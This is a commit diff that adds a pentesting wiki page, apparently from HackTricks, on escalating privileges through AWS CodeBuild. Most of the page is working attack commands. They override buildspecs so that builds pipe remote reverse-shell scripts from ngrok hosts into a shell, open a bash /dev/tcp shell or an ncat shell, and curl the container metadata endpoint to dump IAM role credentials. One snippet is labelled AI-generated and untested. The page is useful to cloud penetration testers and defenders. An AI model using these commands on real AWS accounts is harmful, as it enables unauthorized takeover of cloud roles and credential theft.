Migrate to using mdbook

2026-01-04 16:57:26 -08:00 · 2024-12-31 17:04:35 +01:00
parent b9a9fed802
commit cd27cf5a2e
1373 changed files with 26143 additions and 34152 deletions
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -0,0 +1,349 @@
+# AWS - Codebuild Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## codebuild
+
+Get more info in:
+
+{{#ref}}
+../aws-services/aws-codebuild-enum.md
+{{#endref}}
+
+### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
+
+Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
+
+{{#tabs }}
+{{#tab name="StartBuild" }}
+
+```bash
+cat > /tmp/buildspec.yml <<EOF
+version: 0.2
+
+phases:
+  build:
+      commands:
+            - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
+EOF
+
+aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml
+```
+
+{{#endtab }}
+
+{{#tab name="StartBuildBatch" }}
+
+```bash
+cat > /tmp/buildspec.yml <<EOF
+version: 0.2
+
+batch:
+  fast-fail: false
+  build-list:
+    - identifier: build1
+      env:
+        variables:
+          BUILD_ID: build1
+      buildspec: |
+        version: 0.2
+        env:
+          shell: sh
+        phases:
+          build:
+            commands:
+              - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
+      ignore-failure: true
+EOF
+
+aws codebuild start-build-batch --project <project-name> --buildspec-override file:///tmp/buildspec.yml
+```
+
+{{#endtab }}
+{{#endtabs }}
+
+**Note**: The difference between these two commands is that:
+
+- `StartBuild` triggers a single build job using a specific `buildspec.yml`.
+- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel).
+
+**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+
+### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
+
+An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one.
+
+{{#tabs }}
+{{#tab name="Example1" }}
+
+```bash
+# Enumerate then env and get creds
+REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
+# Get rev shell
+REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
+
+JSON="{
+    \"name\": \"codebuild-demo-project\",
+    \"source\": {
+        \"type\": \"NO_SOURCE\",
+        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+    },
+    \"artifacts\": {
+        \"type\": \"NO_ARTIFACTS\"
+    },
+    \"environment\": {
+        \"type\": \"LINUX_CONTAINER\",
+        \"image\": \"aws/codebuild/standard:1.0\",
+        \"computeType\": \"BUILD_GENERAL1_SMALL\"
+    },
+    \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
+}"
+
+
+REV_PATH="/tmp/rev.json"
+
+printf "$JSON" > $REV_PATH
+
+# Create project
+aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH
+
+# Build it
+aws codebuild start-build --project-name codebuild-demo-project
+
+# Wait 3-4 mins until it's executed
+# Then you can access the logs in the console to find the AWS role token in the output
+
+# Delete the project
+aws codebuild delete-project --name codebuild-demo-project
+```
+
+{{#endtab }}
+
+{{#tab name="Example2" }}
+
+```bash
+# Generated by AI, not tested
+# Create a buildspec.yml file with reverse shell command
+echo 'version: 0.2
+phases:
+  build:
+    commands:
+      - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml
+
+# Upload the buildspec to the bucket and give access to everyone
+aws s3 cp buildspec.yml s3:<S3_BUCKET_NAME>/buildspec.yml
+
+# Create a new CodeBuild project with the buildspec.yml file
+aws codebuild create-project --name reverse-shell-project --source type=S3,location=<S3_BUCKET_NAME>/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role <YOUR_HIGH_PRIVILEGE_ROLE_ARN> --timeout-in-minutes 60
+
+# Start a build with the new project
+aws codebuild start-build --project-name reverse-shell-project
+
+```
+
+{{#endtab }}
+{{#endtabs }}
+
+**Potential Impact:** Direct privesc to any AWS Codebuild role.
+
+> [!WARNING]
+> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**.
+
+> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
+
+> Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials.
+
+> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**.
+
+### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
+
+Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token
+
+```bash
+REV_PATH="/tmp/codebuild_pwn.json"
+
+# Enumerate then env and get creds
+REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
+# Get rev shell
+REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
+
+# You need to indicate the name of the project you want to modify
+JSON="{
+    \"name\": \"<codebuild-demo-project>\",
+    \"source\": {
+        \"type\": \"NO_SOURCE\",
+        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+    },
+    \"artifacts\": {
+        \"type\": \"NO_ARTIFACTS\"
+    },
+    \"environment\": {
+        \"type\": \"LINUX_CONTAINER\",
+        \"image\": \"aws/codebuild/standard:1.0\",
+        \"computeType\": \"BUILD_GENERAL1_SMALL\"
+    },
+    \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
+}"
+
+printf "$JSON" > $REV_PATH
+
+aws codebuild update-project --cli-input-json file://$REV_PATH
+
+aws codebuild start-build --project-name codebuild-demo-project
+```
+
+**Potential Impact:** Direct privesc to any AWS Codebuild role.
+
+### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
+
+Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**.
+
+{{#tabs }}
+{{#tab name="StartBuild" }}
+
+```sh
+REV_PATH="/tmp/codebuild_pwn.json"
+
+# Enumerate then env and get creds
+REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
+# Get rev shell
+REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
+
+JSON="{
+    \"name\": \"<codebuild-demo-project>\",
+    \"source\": {
+        \"type\": \"NO_SOURCE\",
+        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+    },
+    \"artifacts\": {
+        \"type\": \"NO_ARTIFACTS\"
+    },
+    \"environment\": {
+        \"type\": \"LINUX_CONTAINER\",
+        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
+        \"computeType\": \"BUILD_GENERAL1_SMALL\",
+        \"imagePullCredentialsType\": \"CODEBUILD\"
+    }
+}"
+
+# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
+
+printf "$JSON" > $REV_PATH
+
+aws codebuild update-project --cli-input-json file://$REV_PATH
+
+aws codebuild start-build --project-name codebuild-demo-project
+```
+
+{{#endtab }}
+
+{{#tab name="StartBuildBatch" }}
+
+```sh
+REV_PATH="/tmp/codebuild_pwn.json"
+
+# Get rev shell
+REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
+
+# You need to indicate the name of the project you want to modify
+JSON="{
+    \"name\": \"project_name\",
+    \"source\": {
+        \"type\": \"NO_SOURCE\",
+        \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
+    },
+    \"artifacts\": {
+        \"type\": \"NO_ARTIFACTS\"
+    },
+    \"environment\": {
+        \"type\": \"LINUX_CONTAINER\",
+        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
+        \"computeType\": \"BUILD_GENERAL1_SMALL\",
+        \"imagePullCredentialsType\": \"CODEBUILD\"
+    }
+}"
+
+printf "$JSON" > $REV_PATH
+
+# Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild!
+
+aws codebuild update-project --cli-input-json file://$REV_PATH
+
+aws codebuild start-build-batch --project-name codebuild-demo-project
+```
+
+{{#endtab }}
+{{#endtabs }}
+
+**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+
+### SSM
+
+Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built.
+
+The codebuild project will need to have a breakpoint:
+
+<pre class="language-yaml"><code class="lang-yaml">phases:
+  pre_build:
+    commands:
+      - echo Entered the pre_build phase...
+      - echo "Hello World" > /tmp/hello-world
+<strong>      - codebuild-breakpoint
+</strong></code></pre>
+
+And then:
+
+```bash
+aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
+aws ssm start-session --target <sessionTarget> --region <region>
+```
+
+For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html).
+
+### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject`
+
+An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process.
+
+Note: the escalation is relevant only if the CodeBuild worker has a different role, hopefully more privileged, than the one of the attacker.
+
+```bash
+aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./
+
+vim ./buildspec.yml
+
+# Add the following lines in the "phases > pre_builds > commands" section
+#
+#    - apt-get install nmap -y
+#    - ncat <IP> <PORT> -e /bin/sh
+
+aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml
+
+aws codebuild start-build --project-name <project-name>
+
+# Wait for the reverse shell :)
+```
+
+You can use something like this **buildspec** to get a **reverse shell**:
+
+```yaml:buildspec.yml
+version: 0.2
+
+phases:
+  build:
+    commands:
+      - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
+```
+
+**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges.
+
+> [!WARNING]
+> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload
+
+More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/).
+
+**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+
+{{#include ../../../banners/hacktricks-training.md}}